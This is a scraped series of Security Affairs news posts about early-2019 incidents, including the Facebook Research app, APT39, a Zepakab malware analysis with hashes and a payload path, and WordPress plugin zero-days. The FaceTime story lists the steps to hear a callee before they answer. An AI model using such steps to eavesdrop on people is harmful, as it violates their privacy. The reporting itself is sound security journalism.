2018 was a terrible year for Facebook that was in the middle of the Cambridge Analytica privacy scandal. The social network giant was involved in other cases, for example, it was forced to remove its Onavo VPN app from Apple’s App Store because it was caught collecting some of data through Onavo Protect, the Virtual Private Network (VPN) service that it acquired in 2013.

According to a report presented by Privacy International in December at 35C3 hacking conference held in Germany, the list of Android apps that send tracking and personal information back to Facebook includes dozens of apps including KayakYelp, and Shazam, Facebook

Now according to a report published by TechCrunch, Facebook is paying teenagers around $20 a month to use its VPN app that monitors their activity on via the mobile devices.

Facebook Research App Icon

Facebook is accused of using the VPN app to track users’ activities across multiple different apps, especially the use of third-party apps.

“Desperate for data on its competitors, Facebook  has been secretly paying people to install a ‘Facebook Research’ VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August.” reads the report published by Techcrunch.

“Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms.”

Techcrunch reported that some documentation refers to the Facebook Research program as “Project Atlas,” it added that Facebook confirmed the existence of the app.

The news is disconcerting, despite the privacy cases in which Facebook was involved, the company has been paying users ages 13 to 35  as much as $20 per month plus referral fees for installing Facebook Research on their iOS or Android devices. The company described the ‘Facebook Research’ app as “paid social media research study.”

Facebook is distributing the app via third-party beta testing services Applause, BetaBound, and uTest that were also running ads on Instagram and Snapchat recruiting participants to install Facebook Research.

Let’s give a close look at the Facebook Research App. The app requires users to install a custom root enterprise certificate to allow the social media giant to collect private messages in social media apps, chats from in instant messaging apps, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps installed on the users’ devices.

Experts pointed out that in some case, the Facebook Research app also asked users to take screenshots of their Amazon order histories and send it back to Facebook.

Reading the Applause site it is possible to have more info on how the company could use the data:

“By installing the software, you’re giving our client permission to collect data from your phone that will help them understand how you browse the internet, and how you use the features in the apps you’ve installed . . . This means you’re letting our client collect information such as which apps are on your phone, how and when you use them, data about your activities and content within those apps, as well as how other people interact with you or your content within those apps. You are also letting our client collect information about your internet browsing activity (including the websites you visit and data that is exchanged between your device and those websites) and your use of other online services. There are some instances when our client will collect this information even where the app uses encryption, or from within secure browser sessions.” ” the terms read.

Facebook confirmed that the app was developed for research purposes, in particular to study how people use their mobile devices.

“like many companies, we invite people to participate in research that helps us identify things we can be doing better.” explained Facebook.

“helping Facebook understand how people use their mobile devices, we have provided extensive information about the type of data we collect and how they can participate. We do not share this information with others, and people can stop participating at any time.”

Facebook’s spokesperson claimed that the app doesn’t violate the Apple’s Enterprise Certificate program. Techcrunch points out that since Apple requires developers to only use this certificate system for distributing internal corporate apps to their own employees, “recruiting testers and paying them a monthly fee appears to violate the spirit of that rule,”

After the disclosure of the report, Facebook announced that it is planning to shut down the iOS version of the Facebook Research app.

Pierluigi Paganini

(SecurityAffairs – Facebook Research app, Privacy)

The post Facebook paid teens $20 to install a Research App that spies on them appeared first on Security Affairs.



Security Affairs

Facebook paid teens $20 to install a Research App that spies on them

Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via their mobile devices.Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via the mobile devices.

2018 was a terrible year for Facebook that was in the middle of the Cambridge Analytica privacy scandal. The social network giant was involved in other cases, for example, it was forced to remove its Onavo VPN app from Apple’s App Store because it was caught collecting some of data through Onavo Protect, the Virtual Private Network (VPN) service that it acquired in 2013.

According to a report presented by Privacy International in December at 35C3 hacking conference held in Germany, the list of Android apps that send tracking and personal information back to Facebook includes dozens of apps including KayakYelp, and Shazam, Facebook

Now according to a report published by TechCrunch, Facebook is paying teenagers around $20 a month to use its VPN app that monitors their activity on via the mobile devices.

Facebook Research App Icon

Facebook is accused of using the VPN app to track users’ activities across multiple different apps, especially the use of third-party apps.

“Desperate for data on its competitors, Facebook  has been secretly paying people to install a ‘Facebook Research’ VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August.” reads the report published by Techcrunch.

“Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms.”

Techcrunch reported that some documentation refers to the Facebook Research program as “Project Atlas,” it added that Facebook confirmed the existence of the app.

The news is disconcerting, despite the privacy cases in which Facebook was involved, the company has been paying users ages 13 to 35  as much as $20 per month plus referral fees for installing Facebook Research on their iOS or Android devices. The company described the ‘Facebook Research’ app as “paid social media research study.”

Facebook is distributing the app via third-party beta testing services Applause, BetaBound, and uTest that were also running ads on Instagram and Snapchat recruiting participants to install Facebook Research.

Let’s give a close look at the Facebook Research App. The app requires users to install a custom root enterprise certificate to allow the social media giant to collect private messages in social media apps, chats from in instant messaging apps, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps installed on the users’ devices.

Experts pointed out that in some case, the Facebook Research app also asked users to take screenshots of their Amazon order histories and send it back to Facebook.

Reading the Applause site it is possible to have more info on how the company could use the data:

“By installing the software, you’re giving our client permission to collect data from your phone that will help them understand how you browse the internet, and how you use the features in the apps you’ve installed . . . This means you’re letting our client collect information such as which apps are on your phone, how and when you use them, data about your activities and content within those apps, as well as how other people interact with you or your content within those apps. You are also letting our client collect information about your internet browsing activity (including the websites you visit and data that is exchanged between your device and those websites) and your use of other online services. There are some instances when our client will collect this information even where the app uses encryption, or from within secure browser sessions.” ” the terms read.

Facebook confirmed that the app was developed for research purposes, in particular to study how people use their mobile devices.

“like many companies, we invite people to participate in research that helps us identify things we can be doing better.” explained Facebook.

“helping Facebook understand how people use their mobile devices, we have provided extensive information about the type of data we collect and how they can participate. We do not share this information with others, and people can stop participating at any time.”

Facebook’s spokesperson claimed that the app doesn’t violate the Apple’s Enterprise Certificate program. Techcrunch points out that since Apple requires developers to only use this certificate system for distributing internal corporate apps to their own employees, “recruiting testers and paying them a monthly fee appears to violate the spirit of that rule,”

After the disclosure of the report, Facebook announced that it is planning to shut down the iOS version of the Facebook Research app.

Pierluigi Paganini

(SecurityAffairs – Facebook Research app, Privacy)

The post Facebook paid teens $20 to install a Research App that spies on them appeared first on Security Affairs.

Reading the ENISA Threat Landscape Report 2018

According to the ENISA Threat Landscape Report 2018, 2018 has brought significant changes in the techniques, tactics, and procedures associated with cybercrime organizations and nation-state actors.

I’m proud to present you the ENISA Threat Landscape Report 2018, the annual report published by the ENISA ETL group that provides insights on the evolution of the cyber threats in 2018.

ENISA Threat Landscape Report 2018

2018 was characterized by significant changes in the cyber threat landscape especially for TTPs associated with threat agent groups. Financially motivated attackers focused their efforts in develing and spreading crypto-miners, this threat appeared in the top 15 threats included in the report.

Nation-state hacking reduced the use of complex malware and appears to go towards low profile social engineering attacks.

“Recent political activities have underlined the emergence of various, quite novel developments in the perceived role of cyberspace for society and national security.” reads the ENISA Threat Landscape Report 2018. “Cyber-diplomacy, cyber-defence and cyberwar regulation have dominated the headlines. These developments, when transposed to actions, are expected to bring new requirements and new use cases for cyberthreat intelligence.”

ENISA experts believe threat actors are going to adapt their activities towards the changes introduced by to prevents the above interference.

The main trends emerged in the 2018’s cyberthreat landscape are:

  • Mail and phishing messages have become the primary malware infection vector.
  • Exploit Kits have lost their importance in the cyberthreat landscape.
  • Cryptominers have become an important monetization vector for cyber-criminals.
  • State-sponsored agents increasingly target banks by using attack-vectors utilised in cyber-crime.
  • Skill and capability building are the main focus of defenders. Public organisations struggle with staff retention due to strong competition with industry in attracting cybersecurity talents.

The report highlights the importance of cyber threat intelligence to respond to increasingly automated attacks leveraging automated tools and skills. Unfortunately, low-capability organisations/end-users have no access to cyberthreat intelligence solutions exposing them to severe risks of hack.

Another element of concern is the diffusion of IoT devices that are poorly protected.

“The need for generic IoT protection architectures/good practices will remain pressing.” continues the report.

All the above trends are detailed in the ENISA Threat Landscape 2018 (ETL 2018), a must-read for cyber security experts and passionates.

Let me close with the Top Threats 2018, for each threat the report includes detailed information on trends and observed evolution.

Enjoy it!


Pierluigi Paganini

(SecurityAffairs –  cybersecurity, ENISA Threat Landscape Report 2018)

The post Reading the ENISA Threat Landscape Report 2018 appeared first on Security Affairs.

Iran-Linked APT39 group use off-the-shelf tools to steal data

An Iran-linked cyber-espionage group tracked as APT39 is carrying out a widespread campaign using a broad range of custom and off-the-shelf tools.

The APT39 cyberespionage group is carrying out a widespread campaign using a broad range of custom and off-the-shelf tools. The group has been active at least since November 2014, its operations are aligned with the ones attributed to the Chafer group and OilRig groups, it brings together TTPs used by both actors.

APT39 cyber spies focused their operations in the Middle East, other entities targeted by the group are the U.S. and South Korea. Most of the victims belong to the telecommunications and travel industries, cyber spies also targeted high-tech industry and government.

APT39

“APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39’s targeting scope is global, its activities are concentrated in the Middle East.” reads the report published by FireEye.

“APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry.”

The operations collected by the APT39 group aims to collect geopolitical data along with monitoring targets of interest. 

Experts observed an overlap between malware distribution techniques and command and control infrastructures used by APT39 and the ones observed in campaign associated with other Iran-linked APT groups.

Researchers at FireEye pointed out that the POWBAT backdoor used by the APT39 group is different from the one used by the APT34, but they don’t exclude a close collaboration between the two crews collaborate.

“While APT39 and APT34 share some similarities, including malware distribution methods, POWBAT backdoor use, infrastructure nomenclature, and targeting overlaps, we consider APT39 to be distinct from APT34 given its use of a different POWBAT variant. It is possible that these groups work together or share resources at some level.” continues the report.

Initial compromise leverages spear-phishing messages using malicious attachments or including URLs that point to a POWBAT infection. Furthermore, cyberspies also target vulnerable web servers of organizations to install web shells such as ANTAK and ASPXSPY, attackers used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources.

In the post-infection phase, the threat actors leverage custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT that is used by attackers to gain a foothold in a target environment.

Attackers use tools like Mimikatz and Ncrack, along with legitimate tools such as Windows Credential Editor and ProcDump and the port scanner BLUETORCH.

Once inside the target environment, for lateral movement that attackers use tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Other custom tools used by the threat actors are as REDTRIP, PINKTRIP, and BLUETRIP that allow them to create SOCKS5 proxies between infected hosts.

APT39 use to compress data using WinRAR or 7-Zip before exfiltrating it.

“APT39’s targeting not only represents a threat to known targeted industries, but it extends to these organizations’ clientele, which includes a wide variety of sectors and individuals on a global scale.” FireEye concludes. 

“APT39’s activity showcases Iran’s potential global operational reach and how it uses cyber operations as a low-cost and effective tool to facilitate the collection of key data on perceived national security threats and gain advantages against regional and global rivals,”

Pierluigi Paganini

(SecurityAffairs – IRAN, APT39)

The post Iran-Linked APT39 group use off-the-shelf tools to steal data appeared first on Security Affairs.

Sofacy’s Zepakab Downloader Spotted In-The-Wild

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign leveraging the Zepakab Downloader.

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign discovered in January 2019.

The sample has been initially identified by an Italian independent security researcher, who warned the InfoSec community and shared the binary for further analysis.

Cybaze-Yoroi ZLab researchers analyzed this sample to extract indicators and investigate their presence into the Italian landscape.

Technical Analysis

The attack vector is still not clear, APT28 typically use decoy Office documents armed with VB macro. Anyway the analyzed sample pretends to mimic a Microsoft component called “ServiceTray”.

Sha256e6e93c7744d20e2cac2c2b257868686c861d43c6cf3de146b8812778c8283f7d
ThreatZepakab/Zebrocy Downloader
ssdeep12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F

At first glance the executable shows it is packed using UPX v3.0 compressor, a widely known tool commonly used to minimize the PE file size.

Figure 1. Info about malicious PE.

Interestingly, the resource section of the executable shows a typical binary pattern of the AutoIt v3compiled script: the “AUT3!” signature.

Figure 2. Hexadecimal view reporting the AutoIt v3 header.

After the decompilation and the extraction of the script we noticed the script looks simpler than expected: no obfuscation or anti-analysis tricks found.

The usage of AutoIt language is an emerging characteristic of recent Zepakab downloaders, as also stated by Vitali Kremez, independent security researcher who compared this sample with the older Zepakab implant’s version: the behavior and the script structure are very similar, but obviously the new sample use different command-and-controls servers and artifacts’ names.

Figure 3. Part of malicious decompiled AutoIt script.

After statically setting some variables, such as the C2 url and the payload path, the script invokes the “argv” function calculating a 32 characters random ID.

Figure 4. Function to craft a 32-chars random ID.

Then, it runs the “main” routine. The core of Zepakab. Here the malware implements recon functionalities, retrieves machine information and grabs screenshot every minute.

Figure 5. AutoIt script’s main function.

Then, all the information is encoded in Base64 and sent to the C2 through the “connect” function, using a SSL encrypted HTTP channel. Just before sending its message, the malware adds random padding characters, probably to prevent the automatic decoding of the message; the final request looks like this:

Figure 6. POST request sent to C2C.

The machine information sent to the C2 is gathered within the “info” function, invoking the “_computergetoss” routine. This last code snippet is likely borrowed from a publicly available AutoIT library script called “CompInfo.au3”: an AutoIt interface to access the Windows Management Instrumentation framework’s data.  

Figure 7. Function to retrieve information about victim’s machine.

The code analysis performed also identified another re-used snippet of script: the AutoIT WinHttpwrapper was included into the malicious sample to enable network communication through system proxy.

Figure 8. Blog post reporting the Base64 script, shared by a forum user.

Once communication channel has been established, the command and control analyzes the victim check-in information and, if the compromised machine is likely a target, it sends back the final payload.

The payload will eventually be saved into “C:\ProgramData\Windows\Microsoft\Settings\srhost.exe”and executed inside the “crocodile” function.

Figure 9. The “crocodile” function, used to launch the final payload.

Once the final payload is correctly launched ($cr != 0), the function set the $call variable to False and the main loop of the script terminates.

Unfortunately, the C2 destination is down at time of writing, so it was impossible to retrieve the final payload and proceed with in-depth analysis.

Conclusion

Despite its harmful capabilities, the AutoIt Zepakab malware is quite simple and surprisingly does not use any anti-analysis tricks. The Sofacy group borrowed code from publicly available scripts to ease the development of this new weapon in its arsenal and to keep a low profile in terms of TTP, building a cheap and effective info-stealer malware able to bypass traditional antivirus, almost effortless.

CERT-Yoroi assessed no organization part of its constituency has been impacted by this threat.

Further details, including Yara rules and Indicators of compromise (IoCs), are reported in the analysis published on the Yoroi blog.

Further details, including Yara rules and Indicators of compromise (IoCs), are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Zepakab, APT28)


The post Sofacy’s Zepakab Downloader Spotted In-The-Wild appeared first on Security Affairs.

Netanyahu accuses Iran of cyber attacks carried out daily

Israeli Prime Minister Benjamin Netanyahu accuses Iran of launching cyber-attacks on its country with a daily basis.

Prime Minister Benjamin Netanyahu revealed that Iran launched cyber-attacks on Israel on a daily basis, but its experts are able to block them.

“Iran attacks Israel on a daily basis,” Netanyahu declared during a cyber conference in Tel Aviv.

“We monitor these attacks, we see these attacks and we foil these attacks all the time.”

The Israeli Prime Minister added that today countries need to combine an effective cyber defence with a prolific and advanced cyber security industry.

“Any country can be attacked today with cyber-attacks and every country needs the combination of a national cyber defence effort and a robust cyber security industry,” Netanyahu said.

“I think Israel has that… in ways that are in many ways unmatched,” he said.

A few days ago, Israel launched a massive attack on Iranian targets in Syria, after Iranian fighters fired a surface-to-surface rocket at the northern Golan Heights. The Israeli air force hit an airport in Damascus and killed 12 pro-regime fighters.

A few days ago, Israel launched a massive attack on Iranian targets in Syria, after Iranian fighters fired a surface-to-surface rocket at the northern Golan Heights. The Israeli air force hit an airport in Damascus and killed 12 pro-regime fighters.

Netanyahu

In recent months, the operations of Iran-linked APT groups in the Middle East were increased as never before.

Early January, security experts at FireEye uncovered a DNS hijacking campaign that was targeting government agencies, ISPs and other telecommunications providers, Internet infrastructure entities, and sensitive commercial organizations in the Middle East, North Africa, North America and Europe. According to the experts, the campaign is carried out, with “moderate confidence,” by APT groups linked to the Iranian Government.

In 2018, multiple reports published by Palo Alto Networks described TTPs adopted by Iran-linked APT group OilRig (aka APT34) that targeted entities in the Middle East.

Pierluigi Paganini

(SecurityAffairs – Israel, Netanyahu)

I

The post Netanyahu accuses Iran of cyber attacks carried out daily appeared first on Security Affairs.

Law enforcement worldwide hunting users of DDoS-for-Hire services

Europol and law enforcement agencies worldwide are investigating DDoS-for-hire services and hunting users that paid them to carry out cyber attacks.

In April 2018, an international operation conducted by the European law enforcement agencies led by the UK’s National Crime Agency (NCA) and the Dutch Police, with the help of Europol, took down the world’s biggest DDoS-for-hire service.

The operation dubbed Power Off allowed to shut down the biggest DDoS-for-hire service  (webstresser.org) and arrest its administrators. According to the investigators, the platform was involved in over 4 million attacks and arrested its administrators.

DDoS-for-hire service 3

The police arrested 6 members of the crime group behind the ‘webstresser.org website in Scotland, Croatia, Canada, and Serbia on Tuesday.

The Europol confirmed that Webstresser.org had 136,000 registered users and was used to target online services from banks, government institutions, police forces and the gaming world.webstresser.org.

Now law enforcement agencies are now investigating on customers that paid for the DDoS-for-hire-service service.

Europol has announced that the British NCA is conducting several operations all over the world to identify and arrest Webstresser.org users.

“In the United Kingdom a number of webstresser.org users have recently been visited by the police, who have seized over 60 personal electronic devices from them for analysis as part of Operation Power OFF.” reads the press release published by the Europol. “UK police are also conducting a number of live operations against other DDoS criminals; over 250 users of webstresser.org and other DDoS services will soon face action for the damage they have caused.”

The Europol gained access to the accounts of over 151,000 registered Webstresser users when it dismantled the service, the agency also obtained a huge trove of information about them.

According to the Europol, over 250 users of DDoS-for-hire services <, including Webstresser will soon face potential prosecution.

“To this effect, the FBI seized last December 15 other DDoS-for-hire websites, including the relatively well known Downthem and Quantum Stresser. Similarly, the Romanian police has taken measures against the administrators of 2 smaller-scale DDoS platforms and has seized digital evidence, including information about the users.” continues the press release.

Size does not matter – all levels of users are under the radar of law enforcement, be it a gamer booting out the competition out of a game, or a high-level hacker carrying out DDoS attacks against commercial targets for financial gain. “

UK police already raided the homes of several webstresser.org users, in Netherlands authorities are working to unmask Dutch users of the service. A Dutch user of webstresser.org has already received this alternative sanction.

Europol revealed that other countries, including the United States, Belgium, Croatia, France, Germany, Greece, Denmark, Romania, Estonia, Hungary, Ireland, Switzerland, Norway, Lithuania, Portugal, Slovenia, Sweden, Australia, Colombia, Serbia, have also joined the fight against DDoS attacks.

“Emboldened by a perceived anonymity, many young IT enthusiasts get involved in this seemingly low-level crime, unaware of the consequences that such online activities can carry. Cybercrime isn’t a victimless crime and it is taken extremely seriously by law enforcement. The side effects a criminal investigation could have on the lives of these teenagers can be serious, going as far as a prison sentence in some countries.” concludes the Europol.

“Skills in coding, gaming, computer programming, cyber security or anything IT-related are in high demand and there are many careers and opportunities available to use these wisely.”

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – DDoS-for-hire service, hacking)

The post Law enforcement worldwide hunting users of DDoS-for-Hire services appeared first on Security Affairs.

US DoJ charges Huawei sanctions violations and in technology espionage

The US Justice Department charges the Chinese telecommunications giant Huawei in technology theft and violation of sanctions.

The US Justice Department charges the Chinese telecommunications giant Huawei in two cases, including the one that led the arrest of a top executive in Canada on a US warrant.

According to the US DoJ, the charges are the response to persistent action conducted by the Chinese company to exploit American organizations

The US DoJ confirmed 13 charges against Huawei chief financial officer Meng Wanzhou and other three affiliates, they are accused of violating US sanctions on Iran.

Wanzhou is the daughter of the Huawei founder Ren Zhengfei, she is currently out on bail in Canada, she is expected to fight extradition to the United States The arrest has triggered a diplomatic crisis between Canada, US, and China.

Other 10 charges were filed against two Huawei affiliates that are accused of the theft of robot technology from T-Mobile.

“Both sets of charges expose Huawei’s brazen and persistent actions to exploit American companies and financial institutions, and to threaten the free and fair global marketplace,” explained FBI Director Christopher Wray.

“Acting US Attorney General Matthew Whitaker said the extradition request would be sent by a January 30 deadline. A hearing is set for February 6.” reported the AFP press.

According to Whitaker, the indictment doesn’t refer to the involvement of the Chinese government in the case, but China must hold Chinese firms like Huawei accountable for complying with the law.

“As I told Chinese officials in August, China must hold its citizens and Chinese companies accountable for complying with the law.” said
Whitaker.

Pierluigi Paganini

(SecurityAffairs – China, cyber espionage)

The post US DoJ charges Huawei sanctions violations and in technology espionage appeared first on Security Affairs.

Security Affairs: Disable FaceTime, a bug lets you hear a person’s audio before he answers

A major vulnerability in the Apple FaceTime lets you hear the audio of the person you are calling … before they pick up the call.

iPhone, iPad, or Mac users might disable FaceTime to avoid being spied through their devices.

Experts warn that it is possible to call someone via FaceTime and listen via the microphone of their devices before they accept or reject the call.

“There’s a major bug in FaceTime right now that lets you connect to someone and hear their audio without the person even accepting the call.” reads a thread published on MacRumors.  

“This bug is making the rounds on social media, and as 9to5Mac points out, there are major privacy concerns involved. You can force a FaceTime call with someone and hear what they’re saying, perhaps even without their knowledge. 

We tested the bug at MacRumors and were able to initiate a FaceTime call with each other where we could hear the person on the other end without ever having pressed the button to accept the call.”

The flaw affected iOS 12.1 and 12.2 versions, and macOS Mojave.

The procedure to exploit this vulnerability is: 

  • Initiate a FaceTime call with someone. 
  • While the call is ringing, swipe up from the bottom of the display. 
  • Tap on the “Add Person” button. 
  • Add your own phone number when it asks for the number of the person to add. 

When a connection is started, the screen of the caller appears like a standard Group FaceTime call sans video, while on the other person’s screen, it still looks like the call hasn’t been accepted.

The experts pointed out that if the callee press the power button, the front-facing camera feed is also secretly shown to the caller.

Below a video showing the issue:

“The damage potential here is real. You can listen in to soundbites of any iPhone user’s ongoing conversation without them ever knowing that you could hear them. Until Apple fixes the bug, it’s not clear how to defend yourself against this attack either aside from disabling FaceTime altogether.”reported 9to5mac.com.

“As it stands, if your phone is ringing with an incoming FaceTime request, the person on the other end could be listening in.”

Apple will release a security patch to address the vulnerability later this week.

In you want to disable FaceTime follow these instructions. 

“Apple says the issue will be addressed in a software update “later this week”. (Update: Apple has taken Group FaceTime offline in an attempt to address the issue in the interim).” continues 9to5mac.com.

Pierluigi Paganini

(SecurityAffairs – FaceTime, hacking)

The post Disable FaceTime, a bug lets you hear a person’s audio before he answers appeared first on Security Affairs.



Security Affairs

Disable FaceTime, a bug lets you hear a person’s audio before he answers

A major vulnerability in the Apple FaceTime lets you hear the audio of the person you are calling … before they pick up the call.

iPhone, iPad, or Mac users might disable FaceTime to avoid being spied through their devices.

Experts warn that it is possible to call someone via FaceTime and listen via the microphone of their devices before they accept or reject the call.

“There’s a major bug in FaceTime right now that lets you connect to someone and hear their audio without the person even accepting the call.” reads a thread published on MacRumors.  

“This bug is making the rounds on social media, and as 9to5Mac points out, there are major privacy concerns involved. You can force a FaceTime call with someone and hear what they’re saying, perhaps even without their knowledge. 

We tested the bug at MacRumors and were able to initiate a FaceTime call with each other where we could hear the person on the other end without ever having pressed the button to accept the call.”

The flaw affected iOS 12.1 and 12.2 versions, and macOS Mojave.

The procedure to exploit this vulnerability is: 

  • Initiate a FaceTime call with someone. 
  • While the call is ringing, swipe up from the bottom of the display. 
  • Tap on the “Add Person” button. 
  • Add your own phone number when it asks for the number of the person to add. 

When a connection is started, the screen of the caller appears like a standard Group FaceTime call sans video, while on the other person’s screen, it still looks like the call hasn’t been accepted.

The experts pointed out that if the callee press the power button, the front-facing camera feed is also secretly shown to the caller.

Below a video showing the issue:

“The damage potential here is real. You can listen in to soundbites of any iPhone user’s ongoing conversation without them ever knowing that you could hear them. Until Apple fixes the bug, it’s not clear how to defend yourself against this attack either aside from disabling FaceTime altogether.”reported 9to5mac.com.

“As it stands, if your phone is ringing with an incoming FaceTime request, the person on the other end could be listening in.”

Apple will release a security patch to address the vulnerability later this week.

In you want to disable FaceTime follow these instructions. 

“Apple says the issue will be addressed in a software update “later this week”. (Update: Apple has taken Group FaceTime offline in an attempt to address the issue in the interim).” continues 9to5mac.com.

Pierluigi Paganini

(SecurityAffairs – FaceTime, hacking)

The post Disable FaceTime, a bug lets you hear a person’s audio before he answers appeared first on Security Affairs.

Authorities shut down XDEDIC marketplace in an international operation

A  joint operation conducted by law enforcement agencies in the United States and Europe allowed seizing the xDedic marketplace.

Law enforcement agencies in the US and Europe announced the seizure of the popular xDedic marketplace, an underground market offering for sale access to compromised systems and personally identifiable information.

“On 24 January, the U.S. Prosecutor’s Office for the Middle District of Florida, the FBI and the Internal Revenue Service (IRS) of Tampa (Florida), the Federal Computer Crime Unit (FCCU), the Federal Prosecutor’s Office and the Investigating Judge of Belgium, as well as the Ukrainian National Cyber Police and Prosecutor General’s office of Ukraine, with the support of the Bundeskriminalamt of Germany and Europol seized the xDedic Marketplace.” reads the press release published by the Europol.

xdedic seized

The black marketplace has been active since 2014, it was first analyzed by experts at Kaspersky Lab in 2016.

At the time, the domain (xdedic[.]biz) went offline following a report from Kaspersky Labs that detailed in its Corporate News section, the scope, and method of operations of the illicit marketplace. The website quickly reappeared in the Tor network.

In 2016 the service was offering up to 70,000 hacked servers as little as $6 USD, and with 416 registered sellers in 173 countries, the platform was operating a highly successful global business model.

The researchers confirmed that the xDedic marketplace is run by a Russian-speaking group.

xdedic

Law authorities in the United States, Belgium and Ukraine, in collaboration with the Europol, seized xDedic on January 24.

Buyers were able to search accesses to compromised systems by multiple criteria, including price, geographic location, and operating system.

The xDedic administrators maintained servers worldwide, they allowed payment in Bitcoin to protect users’ anonymity. Compromised systems belong to any industries, including local, state, and federal government infrastructure, hospitals, emergency services, major metropolitan transit authorities, accounting and law firms, pension funds, and universities.

According to the investigators, the website facilitated more than $68 million in fraud.

Pierluigi Paganini

(Security Affairs –xDedic market, cybercrime)

The post Authorities shut down XDEDIC marketplace in an international operation appeared first on Security Affairs.

Aztarna – the open-source scanning tool for vulnerable robots

Experts from Alias Robotics released a free, open-source tool dubbed Aztarna that could be used to find vulnerable robots.

A group of experts working a startup focused on robot cybersecurity has released a free, open-source framework dubbed Aztarna that could be used find vulnerable robots that could have been exposed online or inside an industrial environment.

The team of experts works for the cybersecurity firm Alias Robotics, the
Aztarna framework was designed to find vulnerable industrial routers and robots powered by ROS (Robot Operating System), SROS (Secure ROS) and other technologies.

aztarna is an open source instrument developed by Alias Robotics, ready to be used by security researchers interested in robot footprinting. It allows to find robots powered by ROS, SROS and other robot technologies.” reads a blog post published by the experts,

Aztarna works as a classic port scanning tool and compares results with a built-in database of fingerprints for industrial devices from major vendors.

The tool is able to scan most popular industrial routers, including Ewon, Moxa, Westermo and Sierra Wireless manufacturers, for known flaws and misconfigurations.

The experts found close to 9000 insecure industrial routers in a first scan, 1586 of them in Europe, most misconfigured systems were in France (63%) and Spain (54%). The largest number of industrial routers detected was in the North American countries, with poor security settings in  36% in the US and 41% in Canada.

aztarna 3

Anyone could contribute to the project by adding more fingerprints and patterns to support new robot components.

Researchers Alias Robotics informed the owners of the vulnerable robots about their discovery.

“Overall, we conclude that aztarna responds to the need of auditing robot security. As ROS is becoming the de facto standard in robot programming, more and more robots are being exposed everyday. The footprinting techniques on ROS are specially dangerous, because once detected and footprinted, ROS powered systems are inherently vulnerable. Existing robot security mitigations, such as SROS, are not used extensively.” concludes the research paper published by the experts.

“The present study reports mainly research robots aligned with prior art, but we have reported the footprinting of professional robots as well. We have discovered an array of internetconnected unprotected industrial routers, that could potentially host robots. There is an unresolved gap in robotics cybersecurity which would greatly benefit from releasing the first auditing tools.”

Pierluigi Paganini

(SecurityAffairs – Aztarna, hacking)

The post Aztarna – the open-source scanning tool for vulnerable robots appeared first on Security Affairs.

Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin

Security experts at Wordfence security firms discovered WordPress Sites compromised via Zero-Day vulnerabilities in Total Donations Plugin

The Total Donations WordPress plugin was abandoned by its developers for this reason security experts are recommending to delete it after they discovered multiple zero-day flaws that were exploited by threat actors.

The news was reported by security firm Wordfense that observed threat actors are exploiting the zero-day issued in the Total Donations WordPress plugin to gain administrative access to websites running the popular CMS.

Total Donations

Experts attempted to contact the development team behind the plugin, but they did not receive any reply.

“The Wordfence Threat Intelligence team recently identified multiple critical vulnerabilities in the commercial Total Donations plugin for WordPress. These vulnerabilities, present in all known versions of the plugin up to and including 2.0.5, are being exploited by malicious actors to gain administrative access to affected WordPress sites.” reads the security advisory published by Wordfence.

“It is our recommendation that site owners using Total Donations delete–not just deactivate–the vulnerable plugin as soon as possible to secure their sites,”
The zero-day flaws affect all known versions of the WordPress plugin up to and including 2.0.5.

The Total Donations WordPress plugin is currently used by many non-profit and political organizations to receive donations.

Experts tracked the flaws as CVE-2019-6703, they discovered that Total Donations registers a total of 88 unique AJAX actions into WordPress, that can be accessed by unauthenticated users by querying the typical /wp-admin/admin-ajax.php endpoint.

“We have determined that 49 of these 88 actions can be exploited by a malicious actor to access sensitive data, make unauthorized changes to a site’s content and configuration, or take over a vulnerable site entirely. ” continues the analysis.

The flaws could be exploited by an unauthenticated attacker to send requests to the AJAX event to call a specific action to update arbitrary WordPress option values and take over the website. This can be used to enable new user registration and set the default role for new users to Administrator.

The attackers can perform many other malicious actions, including accessing mailing lists from Constant Contact and Mailchimp, that can also modify or delete of recurring Stripe payment plans because
Total Donations can connect to Stripe as a payment processor.

Attackers can send test emails to an arbitrary address, a malicious action that could be automated to trigger a Denial of Service (DoS) for outbound email, either by triggering a host’s outgoing mail relay limits, or by causing the victim site to be included on spam blacklists.

The plugin is currently unavailable for purchase from Envato’s CodeCanyon, anyway, it displays a “Coming Soon” page since May 2018.

“These security flaws are considered zero-day vulnerabilities due to their active exploitation and a lack of an available patch,” researchers explained. “Unfortunately, the process of making this contact revealed that a solution may not ever be coming.”

Pierluigi Paganini

(SecurityAffairs – Total Donations, WordPress plugin)

The post Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin appeared first on Security Affairs.

Dailymotion forces password reset in response to credential stuffing Attack

The popular video sharing website Dailymotion announced that some accounts were accessed by hackers as result of a massive credential stuffing attack.

